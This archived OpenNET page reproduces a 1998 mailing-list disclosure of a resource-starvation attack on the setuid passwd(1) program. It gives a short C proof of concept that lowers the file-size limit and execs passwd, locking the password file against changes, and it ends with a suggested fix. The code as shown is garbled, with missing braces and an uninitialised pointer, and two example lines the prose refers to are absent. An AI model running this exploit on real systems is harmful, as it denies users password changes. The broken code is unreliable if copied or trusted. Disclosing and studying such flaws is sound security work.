The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Хинт: Ищите информацию по ОС OpenBSD ? Рекомендую посмотреть следующие статьи.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

resource starvation against passwd(1)

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Mon, 23 Feb 1998 10:23:07 +0500 (ESK)
Date: Sun, 22 Feb 1998 17:18:11 GMT
From: Antonomasia <ant@NOTATLA.DEMON.CO.UK>
Subject: resource starvation against passwd(1)

Standard apology if old...

This demonstrates a resource starvation attack on the
setuid root passwd(1) program.  In the case I tested it was the
Red Hat Linux passwd-0.50-7 program without shadowing.

#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/resource.h>
main ()
struct  rlimit rl, *rlp;
rlp->rlim_cur=4000 ;
rlp->rlim_max=4000 ;
setrlimit(RLIMIT_FSIZE, rlp);
execl("/usr/bin/passwd", "passwd", (char *) 0);

The resource being restricted is filesize, and if the passwd file is
large enough it cannot be written back and the passwd program dies.
This leaves the passwd file locked against further password changes -
a denial of service attack.

I was unable to write back an incomplete passwd file during my tests,
but I can imagine some systems allowing this, in which case you could
aim for an incomplete last line like this

which could be awkward if any authentication programs interpret it as

A suggested fix is for the passwd program to be aware of the size of
the file before writing, and to quit if failure is predicted.

There are obviously other resources that could be restricted, and there
may be a case for increasing limits on cpu time or file descriptors,
or even filesize to ensure successful completion.

# Antonomasia                      #
# See                        #

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
SpyLOG TopList
InterReklama Advertizing
Интерреклама. Интернет